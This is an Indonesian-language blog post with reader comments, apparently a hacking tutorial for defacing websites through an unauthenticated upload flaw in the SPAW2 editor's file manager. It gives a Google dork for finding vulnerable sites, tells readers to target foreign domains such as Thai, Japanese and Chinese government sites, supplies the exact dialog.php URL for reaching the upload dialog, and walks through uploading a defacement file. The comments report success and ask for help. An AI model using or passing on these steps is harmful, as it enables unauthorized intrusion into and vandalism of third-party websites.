IDCA Blog's

Knowledge is Free | We Share To Everywhere

Thursday, December 20, 2012

Deface Website With Spaw Uploads Vulnerability.

10:48 AM Defacing , 10 Comments
Hallo Sobat ICA, kali ini saya mau share tutorial deface sob, nama teknik defacenya yaitu Deface Website Melalui Spaw Uploads Vulnerability.

Yasudah deh, dari pada lama-lama ngoceh ngga jelas, mending langsung ke target aja gan. Berikut Cara Deface Website Melalui Spaw Uploads Vulnerability 

1). Pertama, Masukan Dorknya :

inurl:”spaw2/uploads/files/”


Setelah sobat memasukan dork diatas dikotak pencarian google, pilih salah satu web yang mau dideface. Tapi ingat, ngga semua website bisa dideface :p

Notes : Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing, contoh saya tambahkan site:th pada akhir dork diatas. Jadi hasilnya begini :

inurl:”spaw2/uploads/files/” site:th

Maksud dari site:th adalah domain negara asal website yang akan kita serang, "site:th" asal kata Thailand, jadi website yang akan kita serang semuanya website Thailand. Kalian juga bisa mengganti dengan domain negara lain, misalnya site:com.my, site:jp, site:gov.cn etc asal jangan site:co.id yah 

2). Setelah sobat masuk kedalam websitenya, sobat liat Url di addressbar. Contoh Urlnya :                     http://contoh.com/spaw2/uploads/files/
3). Ganti pada Bagian /spaw2/uploads/files/ dengan kode dibawah ini :

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Sehingga Menjadi Seperti Ini :

http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file
4). Tekan Enter, Nanti akan Terbuka Seperti Ini :
5). Selanjutnya Liat Terus Gambar, Karena Tutorial ada Didalam Gambar.

6). Next, Pilih File Deface'an Sobat, Lalu klik Open dan Tunggu Hingga Loading Selesai.

7). Selanjutnya Klik Tombol Upload.
8). Jika Proses Upload Selesai, Nanti akan Muncul Daftar File dan diantaranya ada File yang sobat upload tadi.
9). Selesai

Sekian Postingan saya kali ini tentang Cara Deface Website Melalui Spaw Uploads Vulnerability, semoga dapat bermanfaat bagi sobat semua.
By di
Label:

10 comments:

  1. AnonymousDecember 31, 2012 at 9:53 AM

    http://www.blogger.com/comment-iframe.g?blogID=8688590231472219669&postID=20272779200681859&blogspotRpcToken=7024072#%7B%22color%22%3A%22rgb(103%2C%20103%2C%20103)%22%2C%22backgroundColor%22%3A%22rgb(255%2C%200%2C%200)%22%2C%22unvisitedLinkColor%22%3A%22rgb(255%2C%200%2C%200)%22%2C%22fontFamily%22%3A%22Arial%2C%20Helvetica%2C%20sans-serif%22%7D

    ReplyDelete
  2. AnonymousMarch 25, 2013 at 9:55 AM

    susah -_-

    ReplyDelete
  3. AnonymousMarch 25, 2013 at 7:49 PM

    udah nyampe step 7 kok ga bisa di klik upload ya pak -_-a

    ReplyDelete
  4. AnonymousApril 15, 2013 at 10:14 PM

    ini mngking hanya trik ya?, gimana supaya tampilan deface kita tertanam di index home nya?

    ReplyDelete
  5. AnonymousMay 14, 2013 at 5:22 AM

    Step Ke-7 Upload File Kok Nggak Bisa Ya ?? ;((

    ReplyDelete
  6. UnknownMay 20, 2013 at 12:23 AM

    thx ya bro :D berhasill.. hehe

    ReplyDelete
  7. UnknownJune 18, 2013 at 11:04 PM

    Pas Klik Uploadnya Gak Bisa Bro

    ReplyDelete
  8. UnknownJuly 28, 2013 at 2:41 AM

    for newbie :>)

    ReplyDelete
  9. Izza009October 11, 2015 at 3:42 PM

    di bypass bro...
    bisa

    ReplyDelete

Note: Only a member of this blog may post a comment.

Subscribe to: Post Comments (Atom)